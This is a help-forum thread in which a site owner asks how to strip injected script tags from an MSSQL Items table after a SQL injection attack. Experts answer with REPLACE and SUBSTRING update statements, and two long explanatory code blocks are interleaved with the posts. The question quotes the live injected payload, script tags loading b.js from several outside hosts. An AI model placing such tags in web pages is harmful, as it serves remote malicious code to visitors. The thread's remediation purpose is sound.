Solved

Simple SQL question - delete any occurrence in a single field

Posted on 2008-06-26
Last Modified: 2010-04-21
Hi, I have an MSSQL db. I have been hit with a SQL Injection attack. I have someone trying to shore it up for me, but in the meantime, how can I simply delete any occurrence of this:

<script src=http://www.app52.com/b.js></script><script src=http://www.dbupdr.com/b.js></script><script src=http://www.dbupdr.com/b.js></script><script src=http://www.rid34.com/b.js></script><script src=http://www.dl251.com/b.js></script>

it is at the end of every "Description" field in my Items table.

I don't know much about SQL at all, but wondered if you can tell me how I can at least delete the code so my site will run in the meantime while he's trying to find a permanent solution to limit our vulnerability.

I wanted this developer to do it, but so far I'm not too confident in his abilities.

Thanks much.
Question by:Cindy0904
 
LVL 60

Accepted Solution

by:
chapmandew earned 100 total points
ID: 21877386
you could do this several times for each snippet above:

update tablename
set description = replace(description, '<script src=http://www.app52.com/b.js></script>', '')
 
LVL 19

Expert Comment

by:folderol
ID: 21877439
update tablename
set description = substring(description, 1, charindex('<script src', description)-1)
where charindex('<script src', description) > 0   -- only rows that contain the tag; on a row without it charindex is 0 and a length of -1 raises an error
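The two answers above are the two workable shapes of the fix: remove each snippet with REPLACE, or cut the field at the first `<script src` and keep what comes before it. What follows is an added example, not code posted by anyone in this thread, that turns the truncation form into a script a nervous operator can run safely: count first, preview the result, update only rows that actually contain the marker (SUBSTRING or LEFT with a length of -1 raises an error on rows that do not), roll back automatically if anything is left, and finally scan every character column in the database for the same marker, because an injection that rewrote every row of Description may have rewritten other columns too. It assumes SQL Server 2005 or later, schema dbo, and table Items with column Description (the thread names only Items and Description); the CAST to nvarchar(max) is there so it also works if Description is a text column, which CHARINDEX and LEFT cannot read directly.

```sql
-- Added example (not from the thread). Assumptions: SQL Server 2005+, table
-- dbo.Items, column Description. Run from Query Analyzer, Management Studio or
-- sqlcmd, not through a web form.
SET NOCOUNT ON;

DECLARE @marker nvarchar(50);
SET @marker = N'<script src';   -- every injected snippet in the question starts with this

-- 1. How many rows carry the payload right now?
SELECT COUNT(*) AS rows_with_payload
FROM dbo.Items
WHERE CHARINDEX(@marker, CAST(Description AS nvarchar(max))) > 0;

-- 2. Preview the cleaned value before touching anything.
SELECT TOP (20)
       LEFT(CAST(Description AS nvarchar(max)),
            CHARINDEX(@marker, CAST(Description AS nvarchar(max))) - 1) AS cleaned_description
FROM dbo.Items
WHERE CHARINDEX(@marker, CAST(Description AS nvarchar(max))) > 0;

-- 3. Strip everything from the first marker onward. The WHERE clause matters:
--    on a row without the marker CHARINDEX returns 0, LEFT(..., -1) raises
--    "Invalid length parameter", and the whole UPDATE fails.
BEGIN TRANSACTION;

UPDATE dbo.Items
SET Description = LEFT(CAST(Description AS nvarchar(max)),
                       CHARINDEX(@marker, CAST(Description AS nvarchar(max))) - 1)
WHERE CHARINDEX(@marker, CAST(Description AS nvarchar(max))) > 0;

IF EXISTS (SELECT 1 FROM dbo.Items
           WHERE CHARINDEX(@marker, CAST(Description AS nvarchar(max))) > 0)
BEGIN
    ROLLBACK TRANSACTION;        -- the payload survived in some row: look before retrying
    RAISERROR('Cleanup incomplete, rolled back', 16, 1);
END
ELSE
    COMMIT TRANSACTION;

-- 4. Was Description really the only column hit? Build one COUNT query per
--    character column in the database and run them all; every row returned
--    names another column that still contains the marker.
DECLARE @sql nvarchar(max);
SET @sql = N'';

SELECT @sql = @sql
    + N'SELECT ' + QUOTENAME(c.TABLE_SCHEMA, N'''') + N' AS schema_name, '
    + QUOTENAME(c.TABLE_NAME, N'''')   + N' AS table_name, '
    + QUOTENAME(c.COLUMN_NAME, N'''')  + N' AS column_name, COUNT(*) AS hits'
    + N' FROM ' + QUOTENAME(c.TABLE_SCHEMA) + N'.' + QUOTENAME(c.TABLE_NAME)
    + N' WHERE CHARINDEX(@m, CAST(' + QUOTENAME(c.COLUMN_NAME) + N' AS nvarchar(max))) > 0'
    + N' HAVING COUNT(*) > 0;' + NCHAR(13) + NCHAR(10)
FROM INFORMATION_SCHEMA.COLUMNS AS c
JOIN INFORMATION_SCHEMA.TABLES  AS t
  ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
WHERE t.TABLE_TYPE = 'BASE TABLE'
  AND c.DATA_TYPE IN ('char', 'nchar', 'varchar', 'nvarchar', 'text', 'ntext');

EXEC sp_executesql @sql, N'@m nvarchar(50)', @m = @marker;
```

Step 4 is read-only; if it reports other columns, the same guarded UPDATE applies to each of them. Either way the cleanup only buys time: the page that accepted the injection is still accepting it until the code is fixed, so expect the payload to return until the query in that page is parameterized.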
 

Author Comment

by:Cindy0904
ID: 21877930
thanks for the responses. folderol, I don't even know enough to understand what you mean. Can you add the exact code?

Is this right? Since my table name is Items? I'm afraid and want to make sure I don't mess it up worse.

update Items
set description = substring(description, 1, charindex('<script src', description)-1)
where charindex('<script src', description) > 0

Thanks a lot!
 
LVL 60

Expert Comment

by:chapmandew
ID: 21877948
looks right to me.
 

Author Comment

by:Cindy0904
ID: 21878011
Hmm, here's what I get when I tried it:

Server Error in '/MSSQL' Application.
--------------------------------------------------------------------------------

A potentially dangerous Request.Form value was detected from the client (sqlstmt="...harindex('<script src', descri...").
Description: Request Validation has detected a potentially dangerous client input value, and processing of the request has been aborted. This value may indicate an attempt to compromise the security of your application, such as a cross-site scripting attack. You can disable request validation by setting validateRequest=false in the Page directive or in the configuration section. However, it is strongly recommended that your application explicitly check all inputs in this case.

Exception Details: System.Web.HttpRequestValidationException: A potentially dangerous Request.Form value was detected from the client (sqlstmt="...harindex('<script src', descri...").

Source Error:

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:

1. Add a "Debug=true" directive at the top of the file that generated the error. Example:

  <%@ Page Language="C#" Debug="true" %>

or:

2) Add the following section to the configuration file of your application:

<configuration>
   <system.web>
       <compilation debug="true"/>
   </system.web>
</configuration>

Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.

Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.  
 
LVL 19

Expert Comment

by:folderol
ID: 21878103
I am not familiar enough with SQL programming security to be much help, but if you are getting this message in Query Analyzer, and you suspect a lot of table damage, you might have to create a new database and write the good data to it using insert.  Then truncate or drop the old tables and copy the tables back.

This is a super conservative approach anyway, since with this way you don't need backups.  You never update the original tables until you have a working, satisfactory copy.  Your case may not require such thoroughness.

As a test, do

select substring(description, 1, charindex('<script src', description)-1) as description
from items into #tmp_items

select * from #tmp_items

See if the same error occurs.  This won't prove anything really, since someone else may have advice about how to make the update work.
 
LVL 19

Assisted Solution

by:folderol
folderol earned 100 total points
ID: 21878113
Sorry, typo....

select substring(description, 1, charindex('<script src', description)-1) as description
into #tmp_items
from items
where charindex('<script src', description) > 0   -- rows without the tag would give a length of -1 and an error
select * from #tmp_items
 

Author Comment

by:Cindy0904
ID: 21878521
I just keep getting the same error message as above...
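The error pasted above does not come from SQL Server. It is ASP.NET request validation on the web-based query page (the '/MSSQL' application) rejecting the posted form field because it contains `<` followed by a letter and `</`, exactly as it would reject a real cross-site scripting attempt; the statement never reached the database. Running the same statements from Query Analyzer, Management Studio or sqlcmd avoids the problem entirely, and the message's own suggestion of setting validateRequest=false is the wrong fix, since it would switch that check off for every visitor to the application. If the web page is the only console available, the tags can be assembled on the server from NCHAR(60) so the submitted text never contains a literal `<`. The following is an added example, not code from anyone in this thread: it is the accepted answer's REPLACE approach, rewritten that way and collapsed into one statement for the five snippets quoted in the question. It assumes SQL Server 2005 or later, table dbo.Items, and an (n)varchar Description column (REPLACE does not accept a text column).

```sql
-- Added example (not from the thread): the accepted answer's REPLACE form,
-- written so that the text posted through the web query page contains no '<'.
-- Assumptions: SQL Server 2005+, table dbo.Items, an (n)varchar column
-- Description, and the five snippet hosts quoted in the question.
DECLARE @lt nchar(1);
SET @lt = NCHAR(60);             -- '<' assembled on the server, never typed into the form

DECLARE @s1 nvarchar(100), @s2 nvarchar(100), @s3 nvarchar(100), @s4 nvarchar(100);
SET @s1 = @lt + N'script src=http://www.app52.com/b.js>'  + @lt + N'/script>';
SET @s2 = @lt + N'script src=http://www.dbupdr.com/b.js>' + @lt + N'/script>';  -- listed twice; REPLACE removes every occurrence
SET @s3 = @lt + N'script src=http://www.rid34.com/b.js>'  + @lt + N'/script>';
SET @s4 = @lt + N'script src=http://www.dl251.com/b.js>'  + @lt + N'/script>';

-- One statement instead of one UPDATE per snippet; only rows that still
-- contain an injected tag are rewritten.
UPDATE dbo.Items
SET Description = REPLACE(REPLACE(REPLACE(REPLACE(Description, @s1, N''), @s2, N''), @s3, N''), @s4, N'')
WHERE CHARINDEX(@lt + N'script src=', Description) > 0;

-- Expect 0 here; anything else is a snippet pointing at a host not in the list above.
SELECT COUNT(*) AS rows_still_containing_script
FROM dbo.Items
WHERE CHARINDEX(@lt + N'script', Description) > 0;
```

The count at the end is the check worth keeping: a non-zero result means the attacker used a host the question did not list, and the snippet list needs extending rather than the validation needs disabling.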
 

Author Comment

by:Cindy0904
ID: 21878695
Can I pay one of you to go in and remove the code so our site would work? Until we can secure it, it may be back, but if you can then tell me the code to delete it, that would help till the permanent fix.
I'm desperate. Every minute costs money. Thanks.
 
LVL 8

Expert Comment

by:pzozulka
ID: 21879795
What about backups of the DB? It would definitely be a quick fix. Just re-upload the latest copy of your website and the latest copy of your database.
 

Author Comment

by:Cindy0904
ID: 21879823
Yes, my brother unfortunately made a lot of changes before the next backup was made, so he didn't want to lose the changes. thanks.
 
LVL 8

Assisted Solution

by:pzozulka
pzozulka earned 50 total points
ID: 21879830
If time is of the essence and you don't see a solution in the near future, I would backup everything that I have now, and restore it to a test environment.

In the meantime, restore the latest backup. At least you will have something to work with.
 

Author Comment

by:Cindy0904
ID: 21881011
I never could get around that error message, but the developer finally came around and fixed it. Still don't know if it's fixed up to par to guard against future attacks, but I guess we'll backup, backup & wait and see. Thanks for all the help. :)
 

Author Closing Comment

by:Cindy0904
ID: 31471105
thanks guys!
